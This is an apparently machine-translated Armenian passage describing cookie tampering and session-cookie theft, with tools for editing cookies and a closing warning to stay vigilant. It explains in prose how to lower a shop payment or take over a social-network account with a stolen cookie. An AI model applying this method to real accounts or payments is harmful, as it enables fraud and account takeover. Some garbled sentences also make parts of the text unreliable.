Բոլոր թխուկները պահվում և ուղարկվում են վեբ սերվեր (որից նրանք «եկել են») առանց որևէ փոփոխության՝ իրենց սկզբնական ձևով, նույն արժեքներով, տողերով և այլ տվյալներով: Դրանց պարամետրերի միտումնավոր փոփոխությունը կոչվում է թխուկների փոխարինում։ Այլ կերպ ասած, թխուկները փոխարինելիս հարձակվողը ձևացնում է, թե ցանկություն ունի։ Օրինակ, առցանց խանութում վճարում կատարելիս քուքիը փոխում է վճարման գումարը դեպի ներքև, հետևաբար գնումների վրա «խնայողություն» է տեղի ունենում:

Սոցիալական ցանցի գողացված սեսիայի թխուկները ուրիշի հաշվից «տեղադրվում են» մեկ այլ նստաշրջանի մեջ և մեկ այլ համակարգչի վրա: Գողացված թխուկների սեփականատերը ստանում է ամբողջական մուտք դեպի զոհի հաշիվ (նամակագրություն, բովանդակություն, էջի կարգավորումներ), քանի դեռ նա գտնվում է իր էջում։

Թխուկների «խմբագրումն» իրականացվում է հետևյալի միջոցով.

• գործառույթներ» Կառավարեք թխուկները...» Opera բրաուզերում;
• Թխուկների կառավարիչ և առաջադեմ թխուկների կառավարիչ հավելումներ FireFox-ի համար;
• IECookiesView կոմունալ ծառայություններ (միայն համար Internet Explorer);
• տեքստի խմբագիրինչպես AkelPad-ը, NotePad-ը կամ Windows Notepad-ը:

Շատ պարզ միացումիրականացումը բաղկացած է մի քանի քայլերից. Բայց դա արդյունավետ է միայն այն դեպքում, եթե տուժողի համակարգիչը բաց նիստով, օրինակ՝ VKontakte-ն, մնա առանց հսկողության (և երկար ժամանակ):

Որպես կանոն, հաքերներն օգտագործում են վերը նշված գործիքները (+ մյուսները) ինչպես համակցված (քանի որ շատ վեբ ռեսուրսների պաշտպանության մակարդակը բավականին բարձր է), այնպես էլ առանձին (երբ օգտվողները չափազանց միամիտ են):

Եվ ամենակարևորը, մի կորցրեք զգոնությունն ու ուշադրությունը հանգստանալիս կամ ինտերնետում աշխատելիս: